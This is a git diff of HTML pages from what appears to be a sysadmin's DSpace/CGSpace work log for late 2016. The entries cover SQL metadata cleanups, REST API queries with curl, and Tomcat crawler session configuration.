+dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
UPDATE 101
- Hmm, now her name is missing from the authors facet and only shows the authority ID
@@ -547,7 +547,7 @@ UPDATE 101
- On a clean snapshot of the database I see the correct authority should be
f01f7b7b-be3f-4df7-a61d-b73c067de88d
, not fe4b719f-6cc4-4d65-8504-7a83130b9f83
- Updating her authorities again and reindexing:
-dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
UPDATE 101
- Use GitHub icon from Font Awesome instead of a PNG to save one extra network request
@@ -564,8 +564,8 @@ UPDATE 101
- Minor fix to a string in Atmire’s CUA module (#280)
- This seems to be what I’ll need to do for Sonja Vermeulen (but with
2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0
instead on the live site):
-dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
-dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
+dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
- And then update Discovery and Authority indexes
- Minor fix for “Subject” string in Discovery search and Atmire modules (#281)
@@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
- DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console
- People on DSpace mailing list gave me a query to get authors from certain collections:
-dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
+dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
2016-09-30
- Deny access to REST API’s
find-by-metadata-field
endpoint to protect against an upstream security issue (DS-3250)
diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html
index 365520619..fa3edb15e 100644
--- a/docs/2016-10/index.html
+++ b/docs/2016-10/index.html
@@ -42,7 +42,7 @@ I exported a random item’s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
-
+
@@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
- CGSpace crashed a few times today
- Generate list of unique authors in CCAFS collections:
-dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
+dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
2016-10-05
- Work on more infrastructure cleanups for Ansible DSpace role
@@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
- Re-deploy CGSpace with latest changes from late September and early October
- Run fixes for ILRI subjects and delete blank metadata values:
-dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 11
- Run all system updates and reboot CGSpace
@@ -211,7 +211,7 @@ DELETE 11
- A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:
-
$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
+$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
- One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)
@@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA
Start looking at batch fixing of “old” ILRI website links without www or https, for example:
-dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
+dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
- Also CCAFS has HTTPS and their links should use it where possible:
-dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
+dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
- And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):
-dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
+dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
- Turns out there are shit tons of varieties of this, like with http, https, www, separate
</img>
tags, alignments, etc
- Had to find all variations and replace them individually:
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
- Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)
- And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc
@@ -321,9 +321,9 @@ UPDATE 0
- Fix some messed up authors on CGSpace:
-
dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
+dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
UPDATE 10
-dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
+dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
UPDATE 36
- I updated the authority index but nothing seemed to change, so I’ll wait and do it again after I update Discovery below
@@ -336,7 +336,7 @@ UPDATE 36
- Fix a bunch of countries in Open Refine and run the corrections on CGSpace:
-$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
+$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
- Run a shit ton of author fixes from Peter Ballantyne that we’ve been cleaning up for two months:
@@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
- Run a few URL corrections for ilri.org and doi.org, etc:
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
- I skipped metadata fields like citation and description
diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html
index 08b5166b7..9926638c3 100644
--- a/docs/2016-11/index.html
+++ b/docs/2016-11/index.html
@@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire’s Listings and Reports module
Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
"/>
-
+
@@ -160,7 +160,7 @@ java.lang.NullPointerException
- Horrible one liner to get Linode ID from certain Ansible host vars:
-$ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
+$ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
- I noticed some weird CRPs in the database, and they don’t show up in Discovery for some reason, perhaps the
:
- I’ll export these and fix them in batch:
@@ -170,7 +170,7 @@ COPY 22
- Test running the replacements:
-$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
- Add
AMR
to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (#288)
@@ -200,11 +200,11 @@ COPY 22
Helping Megan Zandstra and CIAT with some questions about the REST API
Playing with find-by-metadata-field
, this works:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}'
- But the results are deceiving because metadata fields can have text languages and your query must match exactly!
-dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
+dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
text_value | text_lang
------------+-----------
SEEDS |
@@ -215,23 +215,23 @@ COPY 22
So basically, the text language here could be null, blank, or en_US
To query metadata with these properties, you can do:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
55
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
34
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
- The results (55+34=89) don’t seem to match those from the database:
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
count
-------
15
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
count
-------
4
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
count
-------
66
@@ -267,27 +267,27 @@ COPY 14
- Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:
-dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
+dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
UPDATE 85
- The
fix-metadata.py
script I have is meant for specific metadata values, so if I want to update some text_lang
values I should just do it directly in the database
- For example, on a limited set:
-dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
+dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
UPDATE 420
- And assuming I want to do it for all fields:
-dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
+dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
UPDATE 183726
- After that restarted Tomcat and PostgreSQL (because I’m superstitious about caches) and now I see the following in REST API query:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
71
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
0
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
- Not sure what’s going on, but Discovery shows 83 values, and database shows 85, so I’m going to reindex Discovery just in case
@@ -298,7 +298,7 @@ $ curl -s -H "accept: application/json" -H "Content-Type: applica
So there is apparently this Tomcat native way to limit web crawlers to one session: Crawler Session Manager
After adding that to server.xml
bots matching the pattern in the configuration will all use ONE session, just like normal users:
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -312,7 +312,7 @@ Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
X-Robots-Tag: none
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
- Seems the default regex doesn’t catch Baidu, though:
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -349,7 +349,7 @@ Transfer-Encoding: chunked
Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:
<!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers -->
-<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
- crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
+<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
+ crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
- Looking at the bots that were active yesterday it seems the above regex should be sufficient:
-$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
-Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
-Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
-Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
-Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
-Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
+$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
+Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
+Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
+Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
+Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
- Neat maven trick to exclude some modules from being built:
@@ -393,9 +393,9 @@ COPY 2515
Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test
Test an update old, non-HTTPS links to the CCAFS website in CGSpace metadata:
